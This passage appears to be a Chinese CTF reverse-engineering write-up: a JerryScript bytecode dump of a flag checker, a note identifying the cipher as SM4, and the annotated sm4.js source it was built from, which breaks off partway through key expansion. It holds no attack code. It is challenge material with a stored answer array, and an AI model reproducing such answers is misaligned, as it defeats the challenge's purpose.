 278 : CBC_NEW byte_arg:16
 280 : CBC_ASSIGN_BLOCK
 281 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:5
 284 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:104
 287 : CBC_PUSH_NUMBER_POS_BYTE number:107
 289 : CBC_PUSH_NUMBER_POS_BYTE number:129
 291 : CBC_PUSH_NUMBER_POS_BYTE number:178
 293 : CBC_PUSH_NUMBER_POS_BYTE number:113
 295 : CBC_PUSH_NUMBER_POS_BYTE number:100
 297 : CBC_PUSH_NUMBER_POS_BYTE number:218
 299 : CBC_PUSH_NUMBER_POS_BYTE number:139
 301 : CBC_PUSH_NUMBER_POS_BYTE number:248
 303 : CBC_PUSH_NUMBER_POS_BYTE number:235
 305 : CBC_PUSH_NUMBER_POS_BYTE number:15
 307 : CBC_PUSH_NUMBER_POS_BYTE number:75
 309 : CBC_PUSH_NUMBER_POS_BYTE number:112
 311 : CBC_PUSH_NUMBER_POS_BYTE number:86
 313 : CBC_PUSH_NUMBER_POS_BYTE number:157
 315 : CBC_PUSH_NUMBER_POS_BYTE number:53
 317 : CBC_NEW byte_arg:16
 319 : CBC_ASSIGN_BLOCK
 320 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:6
 323 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:30
 326 : CBC_PUSH_NUMBER_POS_BYTE number:36
 328 : CBC_PUSH_NUMBER_POS_BYTE number:14
 330 : CBC_PUSH_NUMBER_POS_BYTE number:94
 332 : CBC_PUSH_NUMBER_POS_BYTE number:99
 334 : CBC_PUSH_NUMBER_POS_BYTE number:88
 336 : CBC_PUSH_NUMBER_POS_BYTE number:209
 338 : CBC_PUSH_NUMBER_POS_BYTE number:162
 340 : CBC_PUSH_NUMBER_POS_BYTE number:37
 342 : CBC_PUSH_NUMBER_POS_BYTE number:34
 344 : CBC_PUSH_NUMBER_POS_BYTE number:124
 346 : CBC_PUSH_NUMBER_POS_BYTE number:59
 348 : CBC_PUSH_NUMBER_POS_BYTE number:1
 350 : CBC_PUSH_NUMBER_POS_BYTE number:33
 352 : CBC_PUSH_NUMBER_POS_BYTE number:120
 354 : CBC_PUSH_NUMBER_POS_BYTE number:135
 356 : CBC_NEW byte_arg:16
 358 : CBC_ASSIGN_BLOCK
 359 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:7
 362 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:212
 365 : CBC_PUSH_NUMBER_0
 366 : CBC_PUSH_NUMBER_POS_BYTE number:70
 368 : CBC_PUSH_NUMBER_POS_BYTE number:87
 370 : CBC_PUSH_NUMBER_POS_BYTE number:159
 372 : CBC_PUSH_NUMBER_POS_BYTE number:211
 374 : CBC_PUSH_NUMBER_POS_BYTE number:39
 376 : CBC_PUSH_NUMBER_POS_BYTE number:82
 378 : CBC_PUSH_NUMBER_POS_BYTE number:76
 380 : CBC_PUSH_NUMBER_POS_BYTE number:54
 382 : CBC_PUSH_NUMBER_POS_BYTE number:2
 384 : CBC_PUSH_NUMBER_POS_BYTE number:231
 386 : CBC_PUSH_NUMBER_POS_BYTE number:160
 388 : CBC_PUSH_NUMBER_POS_BYTE number:196
 390 : CBC_PUSH_NUMBER_POS_BYTE number:200
 392 : CBC_PUSH_NUMBER_POS_BYTE number:158
 394 : CBC_NEW byte_arg:16
 396 : CBC_ASSIGN_BLOCK
 397 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:8
 400 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:234
 403 : CBC_PUSH_NUMBER_POS_BYTE number:191
 405 : CBC_PUSH_NUMBER_POS_BYTE number:138
 407 : CBC_PUSH_NUMBER_POS_BYTE number:210
 409 : CBC_PUSH_NUMBER_POS_BYTE number:64
 411 : CBC_PUSH_NUMBER_POS_BYTE number:199
 413 : CBC_PUSH_NUMBER_POS_BYTE number:56
 415 : CBC_PUSH_NUMBER_POS_BYTE number:181
 417 : CBC_PUSH_NUMBER_POS_BYTE number:163
 419 : CBC_PUSH_NUMBER_POS_BYTE number:247
 421 : CBC_PUSH_NUMBER_POS_BYTE number:242
 423 : CBC_PUSH_NUMBER_POS_BYTE number:206
 425 : CBC_PUSH_NUMBER_POS_BYTE number:249
 427 : CBC_PUSH_NUMBER_POS_BYTE number:97
 429 : CBC_PUSH_NUMBER_POS_BYTE number:21
 431 : CBC_PUSH_NUMBER_POS_BYTE number:161
 433 : CBC_NEW byte_arg:16
 435 : CBC_ASSIGN_BLOCK
 436 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:9
 439 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:224
 442 : CBC_PUSH_NUMBER_POS_BYTE number:174
 444 : CBC_PUSH_NUMBER_POS_BYTE number:93
 446 : CBC_PUSH_NUMBER_POS_BYTE number:164
 448 : CBC_PUSH_NUMBER_POS_BYTE number:155
 450 : CBC_PUSH_NUMBER_POS_BYTE number:52
 452 : CBC_PUSH_NUMBER_POS_BYTE number:26
 454 : CBC_PUSH_NUMBER_POS_BYTE number:85
 456 : CBC_PUSH_NUMBER_POS_BYTE number:173
 458 : CBC_PUSH_NUMBER_POS_BYTE number:147
 460 : CBC_PUSH_NUMBER_POS_BYTE number:50
 462 : CBC_PUSH_NUMBER_POS_BYTE number:48
 464 : CBC_PUSH_NUMBER_POS_BYTE number:245
 466 : CBC_PUSH_NUMBER_POS_BYTE number:140
 468 : CBC_PUSH_NUMBER_POS_BYTE number:177
 470 : CBC_PUSH_NUMBER_POS_BYTE number:227
 472 : CBC_NEW byte_arg:16
 474 : CBC_ASSIGN_BLOCK
 475 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:10
 478 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:29
 481 : CBC_PUSH_NUMBER_POS_BYTE number:246
 483 : CBC_PUSH_NUMBER_POS_BYTE number:226
 485 : CBC_PUSH_NUMBER_POS_BYTE number:46
 487 : CBC_PUSH_NUMBER_POS_BYTE number:130
 489 : CBC_PUSH_NUMBER_POS_BYTE number:102
 491 : CBC_PUSH_NUMBER_POS_BYTE number:202
 493 : CBC_PUSH_NUMBER_POS_BYTE number:96
 495 : CBC_PUSH_NUMBER_POS_BYTE number:192
 497 : CBC_PUSH_NUMBER_POS_BYTE number:41
 499 : CBC_PUSH_NUMBER_POS_BYTE number:35
 501 : CBC_PUSH_NUMBER_POS_BYTE number:171
 503 : CBC_PUSH_NUMBER_POS_BYTE number:13
 505 : CBC_PUSH_NUMBER_POS_BYTE number:83
 507 : CBC_PUSH_NUMBER_POS_BYTE number:78
 509 : CBC_PUSH_NUMBER_POS_BYTE number:111
 511 : CBC_NEW byte_arg:16
 513 : CBC_ASSIGN_BLOCK
 514 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:11
 517 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:213
 520 : CBC_PUSH_NUMBER_POS_BYTE number:219
 522 : CBC_PUSH_NUMBER_POS_BYTE number:55
 524 : CBC_PUSH_NUMBER_POS_BYTE number:69
 526 : CBC_PUSH_NUMBER_POS_BYTE number:222
 528 : CBC_PUSH_NUMBER_POS_BYTE number:253
 530 : CBC_PUSH_NUMBER_POS_BYTE number:142
 532 : CBC_PUSH_NUMBER_POS_BYTE number:47
 534 : CBC_PUSH_NUMBER_POS_BYTE number:3
 536 : CBC_PUSH_NUMBER_POS_BYTE number:255
 538 : CBC_PUSH_NUMBER_POS_BYTE number:106
 540 : CBC_PUSH_NUMBER_POS_BYTE number:114
 542 : CBC_PUSH_NUMBER_POS_BYTE number:109
 544 : CBC_PUSH_NUMBER_POS_BYTE number:108
 546 : CBC_PUSH_NUMBER_POS_BYTE number:91
 548 : CBC_PUSH_NUMBER_POS_BYTE number:81
 550 : CBC_NEW byte_arg:16
 552 : CBC_ASSIGN_BLOCK
 553 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:12
 556 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:141
 559 : CBC_PUSH_NUMBER_POS_BYTE number:27
 561 : CBC_PUSH_NUMBER_POS_BYTE number:175
 563 : CBC_PUSH_NUMBER_POS_BYTE number:146
 565 : CBC_PUSH_NUMBER_POS_BYTE number:187
 567 : CBC_PUSH_NUMBER_POS_BYTE number:221
 569 : CBC_PUSH_NUMBER_POS_BYTE number:188
 571 : CBC_PUSH_NUMBER_POS_BYTE number:127
 573 : CBC_PUSH_NUMBER_POS_BYTE number:17
 575 : CBC_PUSH_NUMBER_POS_BYTE number:217
 577 : CBC_PUSH_NUMBER_POS_BYTE number:92
 579 : CBC_PUSH_NUMBER_POS_BYTE number:65
 581 : CBC_PUSH_NUMBER_POS_BYTE number:31
 583 : CBC_PUSH_NUMBER_POS_BYTE number:16
 585 : CBC_PUSH_NUMBER_POS_BYTE number:90
 587 : CBC_PUSH_NUMBER_POS_BYTE number:216
 589 : CBC_NEW byte_arg:16
 591 : CBC_ASSIGN_BLOCK
 592 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:13
 595 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:10
 598 : CBC_PUSH_NUMBER_POS_BYTE number:193
 600 : CBC_PUSH_NUMBER_POS_BYTE number:49
 602 : CBC_PUSH_NUMBER_POS_BYTE number:136
 604 : CBC_PUSH_NUMBER_POS_BYTE number:165
 606 : CBC_PUSH_NUMBER_POS_BYTE number:205
 608 : CBC_PUSH_NUMBER_POS_BYTE number:123
 610 : CBC_PUSH_NUMBER_POS_BYTE number:189
 612 : CBC_PUSH_NUMBER_POS_BYTE number:45
 614 : CBC_PUSH_NUMBER_POS_BYTE number:116
 616 : CBC_PUSH_NUMBER_POS_BYTE number:208
 618 : CBC_PUSH_NUMBER_POS_BYTE number:18
 620 : CBC_PUSH_NUMBER_POS_BYTE number:184
 622 : CBC_PUSH_NUMBER_POS_BYTE number:229
 624 : CBC_PUSH_NUMBER_POS_BYTE number:180
 626 : CBC_PUSH_NUMBER_POS_BYTE number:176
 628 : CBC_NEW byte_arg:16
 630 : CBC_ASSIGN_BLOCK
 631 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:14
 634 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:137
 637 : CBC_PUSH_NUMBER_POS_BYTE number:105
 639 : CBC_PUSH_NUMBER_POS_BYTE number:151
 641 : CBC_PUSH_NUMBER_POS_BYTE number:74
 643 : CBC_PUSH_NUMBER_POS_BYTE number:12
 645 : CBC_PUSH_NUMBER_POS_BYTE number:150
 647 : CBC_PUSH_NUMBER_POS_BYTE number:119
 649 : CBC_PUSH_NUMBER_POS_BYTE number:126
 651 : CBC_PUSH_NUMBER_POS_BYTE number:101
 653 : CBC_PUSH_NUMBER_POS_BYTE number:185
 655 : CBC_PUSH_NUMBER_POS_BYTE number:241
 657 : CBC_PUSH_NUMBER_POS_BYTE number:9
 659 : CBC_PUSH_NUMBER_POS_BYTE number:197
 661 : CBC_PUSH_NUMBER_POS_BYTE number:110
 663 : CBC_PUSH_NUMBER_POS_BYTE number:198
 665 : CBC_PUSH_NUMBER_POS_BYTE number:132
 667 : CBC_NEW byte_arg:16
 669 : CBC_ASSIGN_BLOCK
 670 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:5->string(SboxTable) number:15
 673 : CBC_PUSH_LITERAL_PUSH_NUMBER_POS_BYTE ident:23->string(Array) number:24
 676 : CBC_PUSH_NUMBER_POS_BYTE number:240
 678 : CBC_PUSH_NUMBER_POS_BYTE number:125
 680 : CBC_PUSH_NUMBER_POS_BYTE number:236
 682 : CBC_PUSH_NUMBER_POS_BYTE number:58
 684 : CBC_PUSH_NUMBER_POS_BYTE number:220
 686 : CBC_PUSH_NUMBER_POS_BYTE number:77
 688 : CBC_PUSH_NUMBER_POS_BYTE number:32
 690 : CBC_PUSH_NUMBER_POS_BYTE number:121
 692 : CBC_PUSH_NUMBER_POS_BYTE number:238
 694 : CBC_PUSH_NUMBER_POS_BYTE number:95
 696 : CBC_PUSH_NUMBER_POS_BYTE number:62
 698 : CBC_PUSH_NUMBER_POS_BYTE number:215
 700 : CBC_PUSH_NUMBER_POS_BYTE number:203
 702 : CBC_PUSH_NUMBER_POS_BYTE number:57
 704 : CBC_PUSH_NUMBER_POS_BYTE number:72
 706 : CBC_NEW byte_arg:16
 708 : CBC_ASSIGN_BLOCK
 709 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:30->number(462357) const:31->number(472066609)
 713 : CBC_PUSH_THREE_LITERALS const:32->number(943670861) const:33->number(1415275113) const:34->number(1886879365)
 717 : CBC_PUSH_THREE_LITERALS const:35->number(2358483617) const:36->number(2830087869) const:37->number(3301692121)
 721 : CBC_PUSH_THREE_LITERALS const:38->number(3773296373) const:39->number(4228057617) const:40->number(404694573)
 725 : CBC_PUSH_THREE_LITERALS const:41->number(876298825) const:42->number(1347903077) const:43->number(1819507329)
 729 : CBC_PUSH_THREE_LITERALS const:44->number(2291111581) const:45->number(2762715833) const:46->number(3234320085)
 733 : CBC_PUSH_THREE_LITERALS const:47->number(3705924337) const:48->number(4177462797) const:49->number(337322537)
 737 : CBC_PUSH_THREE_LITERALS const:50->number(808926789) const:51->number(1280531041) const:52->number(1752135293)
 741 : CBC_PUSH_THREE_LITERALS const:53->number(2223739545) const:54->number(2695343797) const:55->number(3166948049)
 745 : CBC_PUSH_THREE_LITERALS const:56->number(3638552301) const:57->number(4110090761) const:58->number(269950501)
 749 : CBC_PUSH_THREE_LITERALS const:59->number(741554753) const:60->number(1213159005) const:61->number(1684763257)
 753 : CBC_NEW byte_arg:32
 755 : CBC_ASSIGN_SET_IDENT ident:6->string(CK)
 757 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:62->number(2746333894) const:63->number(1453994832)
 761 : CBC_PUSH_TWO_LITERALS const:64->number(1736282519) const:65->number(2993693404)
 764 : CBC_NEW byte_arg:4
 766 : CBC_ASSIGN_SET_IDENT ident:7->string(FK)
 768 : CBC_PUSH_LITERAL const:66->string(ctf{this_is_an_example})
 770 : CBC_ASSIGN_SET_IDENT ident:18->string(input)
 772 : CBC_PUSH_NUMBER_0
 773 : CBC_ASSIGN_SET_IDENT ident:19->string(num)
 775 : CBC_PUSH_LITERAL ident:23->string(Array)
 777 : CBC_NEW0
 778 : CBC_ASSIGN_SET_IDENT ident:20->string(message)
 780 : CBC_PUSH_NUMBER_0
 781 : CBC_MOV_IDENT reg:1
 783 : CBC_JUMP_FORWARD offset:32(->815)
 785 : CBC_MULTIPLY_TWO_LITERALS ident:19->string(num) const:67->number(256)
 788 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:18->string(input) const:68->string(charCodeAt)
 791 : CBC_PUSH_LITERAL reg:1
 793 : CBC_CALL1_PROP_PUSH_RESULT
 794 : CBC_ADD
 795 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
 797 : CBC_MODULO_TWO_LITERALS reg:1 const:69->number(4)
 800 : CBC_EQUAL_RIGHT_LITERAL const:70->number(3)
 802 : CBC_BRANCH_IF_FALSE_FORWARD offset:11(->813)
 804 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
 807 : CBC_PUSH_LITERAL ident:19->string(num)
 809 : CBC_CALL1_PROP_BLOCK
 810 : CBC_PUSH_NUMBER_0
 811 : CBC_ASSIGN_SET_IDENT_BLOCK ident:19->string(num)
 813 : CBC_PRE_INCR_IDENT reg:1
 815 : CBC_PUSH_TWO_LITERALS reg:1 ident:18->string(input)
 818 : CBC_PUSH_PROP_LITERAL const:72->string(length)
 820 : CBC_LESS
 821 : CBC_BRANCH_IF_TRUE_BACKWARD offset:36(->785)
 823 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:24->string(Math) const:73->string(ceil)
 826 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
 829 : CBC_DIVIDE_RIGHT_LITERAL const:69->number(4)
 831 : CBC_CALL1_PROP_PUSH_RESULT
 832 : CBC_ASSIGN_SET_IDENT ident:21->string(count)
 834 : CBC_MULTIPLY_TWO_LITERALS ident:21->string(count) const:69->number(4)
 837 : CBC_ASSIGN_SET_IDENT ident:22->string(pad_len)
 839 : CBC_JUMP_FORWARD offset:7(->846)
 841 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:71->string(push)
 844 : CBC_PUSH_NUMBER_0
 845 : CBC_CALL1_PROP_BLOCK
 846 : CBC_PUSH_PROP_LITERAL_LITERAL ident:20->string(message) const:72->string(length)
 849 : CBC_LESS_RIGHT_LITERAL ident:22->string(pad_len)
 851 : CBC_BRANCH_IF_TRUE_BACKWARD offset:10(->841)
 853 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:74->number(19088743) const:75->number(2309737967)
 857 : CBC_PUSH_TWO_LITERALS const:76->number(4275878552) const:77->number(1985229328)
 860 : CBC_NEW byte_arg:4
 862 : CBC_ASSIGN_SET_IDENT_BLOCK ident:25->string(key)
 864 : CBC_PUSH_THREE_LITERALS ident:23->string(Array) const:78->number(1605062385) const:79->number(-642825121)
 868 : CBC_PUSH_THREE_LITERALS const:80->number(2061445208) const:81->number(1405610911) const:82->number(1713399267)
 872 : CBC_PUSH_THREE_LITERALS const:83->number(1396669315) const:84->number(1081797168) const:85->number(605181189)
 876 : CBC_PUSH_THREE_LITERALS const:86->number(1824766525) const:87->number(1196148725) const:88->number(763423307)
 880 : CBC_PUSH_LITERAL const:89->number(1125925868)
 882 : CBC_NEW byte_arg:12
 884 : CBC_ASSIGN_SET_IDENT_BLOCK ident:26->string(ans)
 886 : CBC_PUSH_LITERAL ident:23->string(Array)
 888 : CBC_NEW0
 889 : CBC_ASSIGN_SET_IDENT_BLOCK ident:27->string(message_c)
 891 : CBC_PUSH_NUMBER_0
 892 : CBC_MOV_IDENT reg:1
 894 : CBC_JUMP_FORWARD offset:47(->941)
 896 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:20->string(message) const:90->string(splice)
 899 : CBC_PUSH_NUMBER_0
 900 : CBC_PUSH_NUMBER_POS_BYTE number:4
 902 : CBC_CALL2_PROP_PUSH_RESULT
 903 : CBC_MOV_IDENT reg:2
 905 : CBC_PUSH_THREE_LITERALS ident:15->string(encrypt) reg:2 ident:25->string(key)
 909 : CBC_CALL2_PUSH_RESULT
 910 : CBC_MOV_IDENT reg:3
 912 : CBC_PUSH_NUMBER_0
 913 : CBC_MOV_IDENT reg:4
 915 : CBC_JUMP_FORWARD offset:16(->931)
 917 : CBC_PUSH_PROP_LITERAL_LITERAL_REFERENCE ident:27->string(message_c) const:71->string(push)
 920 : CBC_PUSH_THREE_LITERALS ident:28->string(parseInt) reg:3 reg:4
 924 : CBC_PUSH_PROP
 925 : CBC_PUSH_NUMBER_POS_BYTE number:16
 927 : CBC_CALL2_PUSH_RESULT
 928 : CBC_CALL1_PROP_BLOCK
 929 : CBC_PRE_INCR_IDENT reg:4
 931 : CBC_PUSH_TWO_LITERALS reg:4 reg:3
 934 : CBC_PUSH_PROP_LITERAL const:72->string(length)
 936 : CBC_LESS
 937 : CBC_BRANCH_IF_TRUE_BACKWARD offset:20(->917)
 939 : CBC_PRE_INCR_IDENT reg:1
 941 : CBC_LESS_TWO_LITERALS reg:1 ident:21->string(count)
 944 : CBC_BRANCH_IF_TRUE_BACKWARD offset:48(->896)
 946 : CBC_PUSH_LITERAL ident:27->string(message_c)
 948 : CBC_BRANCH_IF_FALSE_FORWARD offset:10(->958)
 950 : CBC_PUSH_THREE_LITERALS ident:29->string(print) ident:17->string(compare_array) ident:27->string(message_c)
 954 : CBC_PUSH_LITERAL ident:26->string(ans)
 956 : CBC_CALL2_PUSH_RESULT
 957 : CBC_CALL1_BLOCK
 958 : CBC_RETURN_FUNCTION_END
false

一开始用记事本打开 snapshot 时看到了 sm4 等关键词,猜测加密算法为 SM4;快照里没有去掉符号名,顺着这些名字直接找到了原始实现的源码:

https://github.com/qiyunlu/UESTC.graduation.docMaster/blob/d8970292ae9abc9fc44936f10b19ac1ad9b1caf7/public/SM2andSM4/js/sm4.js

/*! sm4-1.0.js (c) Windard Yang | <https://www.windard.com/>
 */
/*
 * sm4-1.0.js
 *
 * Copyright (c) 2014 Windard Yang (www.windard.com)
 */
/**
 * @fileOverview
 * @name sm4-1.0.js
 * @author Windard (www.windard.com)
 * @version 1.0.0 (2016-11-17)
 */

/* this is sm4 in javascript by windard , today is 2016 11-17 ,
 *I'm afraid that can I finished this project , but after all
 *in December, everything will be done , that's prefect
 */

/*
 * garbage , rubbish programe language, should havn't big decimal number
 * can't circular bitwise left shift, can do xor well
 */

/*
 * fuck it at all , finally finished it , and there has many other works need to do
 *
 */

// SM4 constants (GB/T 32907). The whole cipher below is a literal transcription
// of the spec, so these tables must match it byte for byte.

// Nonlinear S-box, indexed as SboxTable[high nibble][low nibble].
var SboxTable = [
    [0xd6, 0x90, 0xe9, 0xfe, 0xcc, 0xe1, 0x3d, 0xb7, 0x16, 0xb6, 0x14, 0xc2, 0x28, 0xfb, 0x2c, 0x05],
    [0x2b, 0x67, 0x9a, 0x76, 0x2a, 0xbe, 0x04, 0xc3, 0xaa, 0x44, 0x13, 0x26, 0x49, 0x86, 0x06, 0x99],
    [0x9c, 0x42, 0x50, 0xf4, 0x91, 0xef, 0x98, 0x7a, 0x33, 0x54, 0x0b, 0x43, 0xed, 0xcf, 0xac, 0x62],
    [0xe4, 0xb3, 0x1c, 0xa9, 0xc9, 0x08, 0xe8, 0x95, 0x80, 0xdf, 0x94, 0xfa, 0x75, 0x8f, 0x3f, 0xa6],
    [0x47, 0x07, 0xa7, 0xfc, 0xf3, 0x73, 0x17, 0xba, 0x83, 0x59, 0x3c, 0x19, 0xe6, 0x85, 0x4f, 0xa8],
    [0x68, 0x6b, 0x81, 0xb2, 0x71, 0x64, 0xda, 0x8b, 0xf8, 0xeb, 0x0f, 0x4b, 0x70, 0x56, 0x9d, 0x35],
    [0x1e, 0x24, 0x0e, 0x5e, 0x63, 0x58, 0xd1, 0xa2, 0x25, 0x22, 0x7c, 0x3b, 0x01, 0x21, 0x78, 0x87],
    [0xd4, 0x00, 0x46, 0x57, 0x9f, 0xd3, 0x27, 0x52, 0x4c, 0x36, 0x02, 0xe7, 0xa0, 0xc4, 0xc8, 0x9e],
    [0xea, 0xbf, 0x8a, 0xd2, 0x40, 0xc7, 0x38, 0xb5, 0xa3, 0xf7, 0xf2, 0xce, 0xf9, 0x61, 0x15, 0xa1],
    [0xe0, 0xae, 0x5d, 0xa4, 0x9b, 0x34, 0x1a, 0x55, 0xad, 0x93, 0x32, 0x30, 0xf5, 0x8c, 0xb1, 0xe3],
    [0x1d, 0xf6, 0xe2, 0x2e, 0x82, 0x66, 0xca, 0x60, 0xc0, 0x29, 0x23, 0xab, 0x0d, 0x53, 0x4e, 0x6f],
    [0xd5, 0xdb, 0x37, 0x45, 0xde, 0xfd, 0x8e, 0x2f, 0x03, 0xff, 0x6a, 0x72, 0x6d, 0x6c, 0x5b, 0x51],
    [0x8d, 0x1b, 0xaf, 0x92, 0xbb, 0xdd, 0xbc, 0x7f, 0x11, 0xd9, 0x5c, 0x41, 0x1f, 0x10, 0x5a, 0xd8],
    [0x0a, 0xc1, 0x31, 0x88, 0xa5, 0xcd, 0x7b, 0xbd, 0x2d, 0x74, 0xd0, 0x12, 0xb8, 0xe5, 0xb4, 0xb0],
    [0x89, 0x69, 0x97, 0x4a, 0x0c, 0x96, 0x77, 0x7e, 0x65, 0xb9, 0xf1, 0x09, 0xc5, 0x6e, 0xc6, 0x84],
    [0x18, 0xf0, 0x7d, 0xec, 0x3a, 0xdc, 0x4d, 0x20, 0x79, 0xee, 0x5f, 0x3e, 0xd7, 0xcb, 0x39, 0x48]
];

// Key-schedule round constants CK[0..31].
var CK = [
    0x00070e15, 0x1c232a31, 0x383f464d, 0x545b6269,
    0x70777e85, 0x8c939aa1, 0xa8afb6bd, 0xc4cbd2d9,
    0xe0e7eef5, 0xfc030a11, 0x181f262d, 0x343b4249,
    0x50575e65, 0x6c737a81, 0x888f969d, 0xa4abb2b9,
    0xc0c7ced5, 0xdce3eaf1, 0xf8ff060d, 0x141b2229,
    0x30373e45, 0x4c535a61, 0x686f767d, 0x848b9299,
    0xa0a7aeb5, 0xbcc3cad1, 0xd8dfe6ed, 0xf4fb0209,
    0x10171e25, 0x2c333a41, 0x484f565d, 0x646b7279
];

// System parameters FK[0..3], XORed into the master key before key expansion.
// Values above 2^31 are stored as plain numbers; every consumer applies a
// bitwise operator, which truncates them to int32 anyway.
var FK = [0xa3b1bac6, 0x56aa3350, 0x677d9197, 0xb27022dc];

// function bigxor(a, b) {
//  if (a.toString(2).length < 33 && b.toString(2).length < 33){
//      return a ^ b
//  }
//  var abin = a.toString(2);
//  var bbin = b.toString(2);
//  var loggest = abin.length >= bbin.length ? abin.length : bbin.length;
//  abin = abin.length == loggest ? abin :"0".repeat(loggest - abin.length) + abin;
//  bbin = bbin.length == loggest ? bbin :"0".repeat(loggest - bbin.length) + bbin;
//  var result = "";
//  for (var i = loggest - 1; i >= 0; i--) {
//      result = abin[i] == bbin[i] ? '0'+result : '1'+result;
//  };
//  return parseInt(result, 2);
// }

/**
 * XOR two 32-bit words.
 *
 * The name is a leftover from the big-number version above; JS bitwise
 * operators already coerce both operands to int32, so this is plain `^`.
 * The result is a signed int32 (may be negative for values >= 2^31).
 */
function bigxor(a, b) {
    var lhs = a | 0;
    var rhs = b | 0;
    return lhs ^ rhs;
}

// function leftshift(a, n, size=32) {
//  var result = new Array(size);
//  result.fill(0);
//  var bin = a.toString(2);
//  bin = bin.length == size ? bin :"0".repeat(size - bin.length) + bin;
//  for (var i = bin.length - 1; i >= 0; i--) {
//      result[(i - n + size)%size] = bin[i];
//  };
//  result = result.join("");
//  return parseInt(result, 2);
// }

/**
 * Rotate `a` left by `n` bits within a `size`-bit word (default 32).
 *
 * `n` is reduced modulo `size` first, so n = 0 and n = 32 are both identity.
 * The high part uses `<<` (int32), the wrapped-around low part `>>>`, and the
 * two are OR-ed, so the result is a signed int32 like every other word here.
 */
function leftshift(a, n, size = 32) {
    var shift = n % size;
    var high = a << shift;
    var wrapped = a >>> (size - shift);
    return high | wrapped;
}

/**
 * Left-pad `str` with '0' to exactly `length` characters.
 *
 * If `str` is already longer than `length`, only its last `length`
 * characters are kept (so this also truncates, unlike padStart).
 */
function prefixInteger(str, length) {
    var zeros = Array(length + 1).join("0");
    var padded = zeros + String(str);
    return padded.slice(-length);
}

// function sm4Sbox(a) {
//  var a1 = prefixInteger(a.toString(16),8).slice(0,2);
//  var a2 = prefixInteger(a.toString(16),8).slice(2,4);
//  var a3 = prefixInteger(a.toString(16),8).slice(4,6);
//  var a4 = prefixInteger(a.toString(16),8).slice(6,8);
//  var b1 = SboxTable[parseInt(a1[0], 16)][parseInt(a1[1], 16)];
//  var b2 = SboxTable[parseInt(a2[0], 16)][parseInt(a2[1], 16)];
//  var b3 = SboxTable[parseInt(a3[0], 16)][parseInt(a3[1], 16)];
//  var b4 = SboxTable[parseInt(a4[0], 16)][parseInt(a4[1], 16)];
//  return parseInt(prefixInteger(b1.toString(16), 2) + prefixInteger(b2.toString(16), 2) + prefixInteger(b3.toString(16), 2) + prefixInteger(b4.toString(16), 2) , 16)
// }

/**
 * SM4 nonlinear layer tau: apply the S-box to each of the four bytes of `a`.
 *
 * Each byte is looked up as SboxTable[high nibble][low nibble]; the bytes are
 * reassembled most-significant first. Result is a signed int32.
 */
function sm4Sbox(a) {
    var out = 0;
    for (var shift = 24; shift >= 0; shift -= 8) {
        var octet = (a >>> shift) & 0xff;
        out = (out << 8) | SboxTable[octet >>> 4][octet & 0x0f];
    }
    return out;
}

/**
 * Round-function transform T of SM4 (the name is a misnomer; nothing here
 * is byte-order related): S-box the word, then the linear layer
 *   L(B) = B ^ (B <<< 2) ^ (B <<< 10) ^ (B <<< 18) ^ (B <<< 24).
 */
function GET_ULONG_BE(a) {
    var b = sm4Sbox(a);
    var rotations = [2, 10, 18, 24];
    var result = b;
    for (var i = 0; i < rotations.length; i++) {
        result = bigxor(result, leftshift(b, rotations[i]));
    }
    return result;
}

/**
 * Key-schedule transform T' of SM4 (again misnamed): S-box the word, then
 *   L'(B) = B ^ (B <<< 13) ^ (B <<< 23).
 */
function PUT_ULONG_BE(b) {
    var s = sm4Sbox(b);
    var rotated = bigxor(leftshift(s, 13), leftshift(s, 23));
    return bigxor(s, rotated);
}

/**
 * SM4 key expansion.
 *
 * @param MK  master key as four 32-bit words.
 * @return    the 32 round keys rk[0..31], each as a hex *string* from
 *            Number.toString(16) — so a negative int32 comes out as "-…".
 *            Consumers parse them back with parseInt(rk[i], 16), which
 *            round-trips that representation.
 */
function sm4_getkey(MK) {
    var K = [
        bigxor(MK[0], FK[0]),
        bigxor(MK[1], FK[1]),
        bigxor(MK[2], FK[2]),
        bigxor(MK[3], FK[3])
    ];
    var rk = [];
    for (var i = 0; i < 32; i++) {
